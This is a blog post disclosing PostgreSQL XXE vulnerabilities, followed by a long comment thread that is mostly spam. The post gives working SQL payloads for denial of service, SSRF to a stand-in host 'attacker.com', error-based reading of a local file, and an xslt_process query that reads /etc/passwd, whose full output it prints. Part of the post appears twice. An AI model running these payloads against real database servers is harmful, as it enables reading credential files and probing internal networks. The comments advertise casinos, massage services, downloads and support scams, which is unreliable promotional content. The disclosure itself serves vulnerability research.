Recently we found and published at PHDays PostgreSQL 0day error-based XXE vulnerability.
Currently it may be used by attacker to read parts of local files and make requests from DB server to intranet (SSRF - Server Side Request Forgery).
Example:
DoS:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')
SSRF:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')
Error-based XXE:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');
Classical XXE from XSLT transformation found.
Reading any data are possible also:
SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*"> <xsl:element name="samples"> <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element> </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
Currently it may be used by attacker to read parts of local files and make requests from DB server to intranet (SSRF - Server Side Request Forgery).
Example:
DoS:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')
SSRF:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')
Error-based XXE:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');
ERROR: invalid XML documentUPDATE!
DETAILS: /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
exec 9<&0 </etc/fstab ^
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
exec 9<&0 </etc/fstab ^
/etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced
exec 9<&0 </etc/fstab ^
Entity: line 1: parser error : Failure to process entity abc
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
^
Entity: line 1: parser error : Entity 'abc' not defined
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc; ^
Classical XXE from XSLT transformation found.
Reading any data are possible also:
SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*"> <xsl:element name="samples"> <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element> </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
xslt_process
-----------------------------------------------------------------------------------------
<?xml version="1.0"?>
<samples><sample>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
Debian-exim:x:111:115::/var/spool/exim4:/bin/false
alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash
oxod:x:1001:1001:,,,:/home/oxod:/bin/bash
mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
oracle:x:1002:1002::/u01/app/oracle:/bin/bash
</sample></samples>
(1 row)
I'd like to notice that xslt_process is from xml2 postgres module, which is being deprecated [1]. E.g. in psql 9.1.3 it is turned off by default.
ОтветитьУдалитьPS. That's why I wasn't able to discover this file-reading during phdays =)
[1] http://www.postgresql.org/docs/9.1/static/xml2.html
Nice Post. Thanks for writing this article. دانلود آهنگ جدید
УдалитьThank your post.
ОтветитьУдалитьThis is my list website: Thuc pham chuc nang chinh hang
cach giam can bang Herbalife
Gioi thieu ve cong ty Herbalife
Phuong phap giam can an toan
Giam can bang Herbalife co tot khong
Nice Post. Thanks for writing this article.
ОтветитьУдалитьGPA Calculator
ОтветитьУдалитьدانلود فيلم ماجراي نيمروز 2 رد خون
دانلود فيلم چشم و گوش بسته
ОтветитьУдалитьشركات نقل الاثاث بالاسكندرية
شركة نقل اثاث بالاسكندرية
شركات نقل العفش بالاسكندرية
ونش رفع اثاث بالاسكندرية
ونش رفع عفش
شركة ونش رفع عفش
دانلود آهنگ مسعود صادقلو
ОтветитьУдалитьآهنگهای مسیح و آرش
آهنگ جدید معین زد
Скачать Pink Panther Sound
ОтветитьУдалитьIf you found any login related issue in your Quickbooks software, you can download Quickbooks Tool Hub which is the hub of all necessary tools which are used to diagnose issues. It can fix all minor and major issues.
ОтветитьУдалитьThank you for the share!
ОтветитьУдалитьSEO Work Online And Mange Site [Updated 2021]
HOW TO SOLVE AVAST ANTIVIRUS RUNTIME ERROR 42052
Malwarebytes Unable To Start The Service (Updated 2021)
Mcafee.com/activate – Download and Activate McAfee Online
Hi! This is my first visit to your blog! We are a team of volunteers and new initiatives in the same niche. Blog gave us useful information to work. You have done an amazing job Feel free to visit my website; 카지노사이트링크
ОтветитьУдалитьNice one! Thank you for sharing this post. Your blog posts are more interesting and impressive. Feel free to visit my website; 온라인카지노사이트넷
ОтветитьУдалитьThe most common legal entity (business) established in Latvia, Lithuania and Estonia is a limited liability company, also known as LLC. This type of enterprise provides its owner with business opportunities while limiting the risk of direct investment and without affecting his personal obligations. There are no restrictions on the creation of a company - an enterprise can be created by a resident, non-resident or legal entity. In Latvia the LLC is called SIA, in Estonia - OÜ, and in Lithuania - UAB. https://www.baltic-legal.com/business-support-services-eng.htm
ОтветитьУдалитьThere are certainly a lot of details like that to take into consideration. That is a great point to bring up. I offer the thoughts above as general inspiration but clearly there are questions like the one you bring up where the most important thing will be working in honest good faith. I don?t know if best practices have emerged around things like that, but I am sure that your job is clearly identified as a fair game. Both boys and girls feel the impact of just a moment’s pleasure, for the rest of their lives.
ОтветитьУдалитьWarriorforum.com
Information
Click Here
Visit Web
دانلود آهنگ
ОтветитьУдалитьجدیدترین آهنگ
You have a great blog here! would you like to make some invite posts on my blog?
ОтветитьУдалитьBibrave.com
Information
Click Here
Visit Web
If you're looking for fitness band in India here you can buy. Get best fitness band under 2000 get the best fitness tracker now and best tracker in India. best fitness band in india under 2000
ОтветитьУдалитьHi! Quick question that’s totally off topic.
ОтветитьУдалитьDo you know how to make your site mobile friendly? My website looks weird when browsing from my apple iphone. I’m trying to find a template or plugin that might be able to correct this problem. If you have any suggestions, please share.
Appreciate it!
Geo-park.comB
Trackingapp4.embluejet.com
Radio1.si
Firestation.ie
수원출장안마
ОтветитьУдалить의령출장안마
김포출장안마
김포출장안마
남양주출장안마
성남출장안마
함안출장안마
수원출장안마
برای مشاوره در زمینه خرید فیلتر تصفیه استخر در انواع مختلف، ما به شما فروشگاه فراتاسیسات را پیشنهاد میکنیم. مشاوران این شرکت بهترین راهنماییها در زمینه خرید انواع تجهیزات استخر در تهران و ارسال به تمامی ایران را دارند. از جمله خرید خرید فیلتر شنی ایماکس و سایر انواع صافیها و تجهیزات مرتبط با تصفیه استخر را بهصورت رایگان در اختیار شما قرار میدهند. بعلاوه، این شرکت کلیه خدمات مرتبط با انواع استخر و جکوزی از جمله راهاندازی سیستم گرمایش استخر در تهران را با مناسبترین قیمت و با بهترین کیفیت ارایه میکند.
ОтветитьУдалить